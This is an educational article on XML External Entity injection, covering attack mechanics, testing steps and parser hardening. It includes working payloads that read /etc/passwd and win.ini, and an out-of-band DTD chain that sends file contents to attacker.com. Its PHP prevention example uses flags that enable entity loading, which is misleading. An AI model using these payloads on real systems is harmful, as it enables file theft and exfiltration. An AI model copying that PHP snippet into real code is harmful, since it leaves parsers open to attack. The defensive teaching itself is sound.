A Practical Dive into XML External Entity Injection
XML documents rely on a structured format that includes a declaration, an optional DTD (Document Type Definition), and the main data elements. The DTD allows the definition of entities, which act as placeholders that can expand to predefined values. When an entity references an external resource via the SYSTEM keyword, the XML parser may fetch and insert that resource’s content during processing.
Consider a simple XML payload:
<?xml version="1.0"?>
<!DOCTYPE demo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<app>
<user>&xxe;</user>
</app>
If the receiving application parses this XML without disabling external entity resolution, the parser will attempt to read the local file /etc/passwd and replace the &xxe; reference with its contents, which then might be reflected in the application’s response.
This behavior originates from the XML specification itself, not from a programming error in the strict sense, but from failing to restrict parser features. Modern libraries often provide safe defaults. For instance, PHP’s libxml versions 2.9.0 and later disable external entity loading by default when using functions like simplexml_load_string. However, developers may inadvertently re-enable dangerous features or use older library versions.
Crafting Attacks with DTDs
Attackers can declare entities inside the DTD block of the XML payload (internal DTD) or reference an externally hosted DTD file:
<!DOCTYPE data [
<!ENTITY % payload SYSTEM "http://attacker.com/evil.dtd">
%payload;
]>
External DTDs enable out-of-band exfiltration when direct output is not available. The attacker hosts a malicious DTD that defines an entity wrapping sensitive system data and sends it to the attacker’s server:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % send SYSTEM 'http://attacker.com/?collect=%file;'>">
%eval;
%send;
The target parser follows the chain: it reads the local file into %file, constructs a dynamic entity send that includes the file content in a URL, and finally triggers send, ganerating an HTTP request that leaks the data.
Identifying XXE Entry Points
Applications that accept XML input—whether in raw XML format, SOAP web services, or even hidden inside JSON or YAML structures—may process the XML with a vulnerable parser. Indicators include:
- SOAP endpoints with a
Content-Typeoftext/xmlorapplication/xml. - Web services that except user-defined XML payloads (e.g., REST APIs with XML body).
- Any endpoint where XML appears with in another encoding, like a base64-encoded string inside JSON. A common scenario is converting JSON to XML on the server side.
Testing with a Practical Example
Assume a web application that echoes a name element:
<?xml version="1.0"?>
<data>
<name>guest</name>
</data>
The server responds with "Hello, guest". To test for XXE, submit:
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY probe SYSTEM "http://yourserver.test/check">
]>
<data>
<name>&probe;</name>
</data>
If the server makes a request to your domain, the parser supports external entities. Next, attempt file read by changing the entity to file:///C:/windows/win.ini (Windows) or file:///etc/passwd (Unix-like). A reflected file confirms the vulnerability.
For blind scenarios, employ an out-of-band technique with an external DTD as described above. Additionally, parameter entities can be used to bypass certain restrictions, such as when the application validates the document structure before processing.
Preventing XXE
The most reliable defense is to completely disable DTD processing and external entities in the XML parser. Configuration depends on the language and library. In PHP with DOMDocument, for example:
$dom = new DOMDocument();
$dom->loadXML($xmlInput, LIBXML_NOENT | LIBXML_DTDLOAD);
// Better: completely disable external resources
$dom->loadXML($xmlInput, LIBXML_NONET);
For Java’s DocumentBuilderFactory, set:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
Besides parser hardening, validate input against an XML schema (XSD) when the structure is known, and whitelist acceptable protocols. Avoid manual serialization/deserialization of XML where possible, and keep all XML libraries up to date.